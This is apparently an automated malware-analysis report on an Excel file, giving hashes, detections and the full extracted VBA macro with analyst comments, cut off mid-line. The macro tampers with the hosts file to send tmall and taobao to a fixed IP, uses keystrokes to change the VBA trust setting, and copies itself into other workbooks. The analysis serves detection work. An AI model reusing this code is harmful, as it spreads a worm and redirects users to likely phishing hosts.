Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4d8eaeead00929d8…

MALICIOUS

Office (OLE)

33.5 KB Created: 2020-01-10 06:33:06 Authoring application: Microsoft Excel First seen: 2020-07-24
MD5: 5840400075dc451e34f44bef636fd856 SHA-1: 63c9577af361894c1794a8863e078065c013bf37 SHA-256: 4d8eaeead00929d83c9517e255fb5c63fca1b7625de6c288be00e87b68045752
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The VBA macro within this Excel file is designed to modify the system's hosts file. Specifically, it attempts to append entries that redirect 'www.tmall.com' and 'www.taobao.com' to the IP address 45.78.21.150. This technique is often used to redirect users to phishing or malware distribution sites. The Workbook_Open heuristic and ClamAV detection further support its malicious nature.

Heuristics 3

  • ClamAV: Xls.Malware.Xanpei-9448553-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Xanpei-9448553-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5842 bytes
SHA-256: 7874e51af2a2238084c6fc777206f8f9a31a3430c13e0dc7b6ca9d6dd452ba9c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Win32 import: GetSystemDirectoryA fills lpBuffer with the system directory path.
' Used only by OfficeCheck below to build the hosts-file path.
Private Declare PtrSafe Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
' Application-level event sink. The code that p2d injects into other workbooks
' (see its InsertLines calls) executes "Set App = Application" in Workbook_Open and
' defines App_WorkbookOpen, so workbook-open events for the whole Excel session reach
' the injected handler. The Attribute line must stay directly after the declaration.
Private WithEvents App As Application
Attribute App.VB_VarHelpID = -1
' Analyst note: hosts-file tampering routine. Intended effect is to add, or un-comment,
' entries mapping www.tmall.com and www.taobao.com to 45.78.21.150.
' As written, the outer guard "If InStr(t, Sysadd) <> 0" tests t before t has been
' assigned; a freshly declared String is empty and InStr on an empty string returns 0,
' so the body of that If should not execute in this build. Confirm dynamically before
' reporting the hosts modification as an observed effect rather than an intended one.
Sub OfficeCheck()
Dim SysParh As String, Sysadd As String, t As String, sysadd1 As String
' 256-space buffer for the Win32 call; Trim strips the unused padding and the
' Left(..., Len - 1) drops the final character (presumably the NUL written by the API).
SysParh = Space(256)
GetSystemDirectory SysParh, 256
SysParh = Trim(SysParh)
SysParh = Left(SysParh, Len(SysParh) - 1)
' An absolute path is appended to the system-directory string instead of a relative
' suffix such as "\drivers\etc\hosts"; the resulting path looks malformed. Check in a
' sandbox what the Open statements below actually resolve to.
SysParh = SysParh & "C:\Windows\System32\drivers\etc\hosts"
' Active hosts entry and its commented-out ("#") form.
Sysadd = "45.78.21.150 www.tmall.com"
sysadd1 = "#45.78.21.150 www.tmall.com"
If InStr(t, Sysadd) <> 0 Then
' Read the whole hosts file into t.
Open SysParh For Input As #1
t = Input(LOF(1), #1)
Close #1
' Entry already present: rewrite the file with the tmall and taobao lines un-commented.
If InStr(t, Sysadd) <> 0 Then
Open SysParh For Output As #1
t = Replace(t, sysadd1, Sysadd)
t = Replace(t, "#45.78.21.150 www.taobao.com", "45.78.21.150 www.taobao.com")
Print #1, t
Close #1
End If
' Entry absent: append both redirect lines.
If InStr(t, Sysadd) = 0 Then
Open SysParh For Append As #1
Print #1, vbNewLine & Sysadd & vbNewLine & "45.78.21.150 www.taobao.com"
Close #1
End If
End If
End Sub
' Schedules thisworkbook.p2d to run 5 seconds from now via Application.OnTime.
' Detection note: OnTime-delayed execution of a private procedure is a useful behavioural
' indicator in dynamic analysis. Nothing in the visible part of this listing calls runtimer.
Sub runtimer()
Application.OnTime Now + TimeValue("00:00:05"), "thisworkbook.p2d"
End Sub
' Self-propagation into the active workbook. All errors are suppressed (On Error Resume Next),
' so failures of any step below are silent.
Private Sub p2d()
On Error Resume Next
' Probe access to the VBA project object model. Error 1004 is treated as "access denied";
' the macro then sends keystrokes (Alt sequence + ENTER) to the Excel UI, apparently
' trying to change that trust setting itself. SendKeys issued from a macro right after a
' VBProject access failure is a strong detection signal.
Debug.Print ThisWorkbook.VBProject.VBComponents("ThisWorkbook")
If Err.Number = 1004 Then
Err.Clear
Application.SendKeys "%(qtmstv){ENTER}"
DoEvents
End If
   ' Copy the first 105 lines of this module's source into WBstr (hard-coded count; the
   ' .CountOfLines alternative is commented out). i is never declared, so no Option
   ' Explicit is in effect here. Wb is declared but unused in this procedure.
   Dim WBstr$, Wb As Workbook
    With ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
        For i = 1 To 105 '.CountOfLines
            WBstr = WBstr & .Lines(i, 1) & Chr(10)
        Next
    End With
    ' FileFormat 52 = xlOpenXMLWorkbookMacroEnabled (.xlsm), 56 = xlExcel8 (.xls).
    ' If the active workbook is one of those and its ThisWorkbook module is empty, inject
    ' the copied source plus a Workbook_Open that binds App to Application, so that the
    ' injected App_WorkbookOpen handler calls OfficeCheck and d2p for later workbook opens.
    ' Line 150 is used as the insertion point for the stubs; the copied block is inserted at line 2.
    If ActiveWorkbook.FileFormat = 52 Or ActiveWorkbook.FileFormat = 56 Then
    If ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.CountOfLines = 0 Then
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 2, WBstr
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 150, "Sub Workbook_Open()"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 151, "Set App = Application"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 152, "End Sub"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 153, "Private Sub App_WorkbookOpen(ByVal Wb As Workbook)"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 154, "Call OfficeCheck"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 155, "Call d2p"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 156, "End Sub"
    End If
    End If
End Sub
Private Sub d2p()
Dim pth As String
Dim Exl As Excel.Application
Dim WBstr$, fn$, Wb As Workbook
Dim ws As Worksheet
On Error Resume Next
Debug.Print ThisWorkbook.VBProject.VBComponents("ThisWorkbook")
If Err.Number = 1004 Then
Err.Clear
Application.SendKeys "%(qtmstv){ENTER}"
DoEvents
End If
pth = Application.StartupPath & "\accelerate.xls"
If Dir(pth) = "" Then
Debug.Print ThisWorkbook.VBProject.VBComponents("ThisWorkbook")
If Err.Number <> 1004 Then
    Workbooks.Add.SaveAs Filename:=pth, FileFormat:=18
Else
    Workbooks.Close
End If
Else
    Exit Sub
End If
    Set Wb = Workbooks.Open(pth)
        With ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
        For i = 1 To 105 '.CountOfLines
            WBstr = WBstr & .Lines(i, 1) & Chr(10)
        Next
    End With
    If ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.CountOfLines = 0 Then
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 2, WBstr
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 150, "Sub Workbook_Open()"
    ActiveWorkbook.VBProject.VBComponents("This
... (truncated)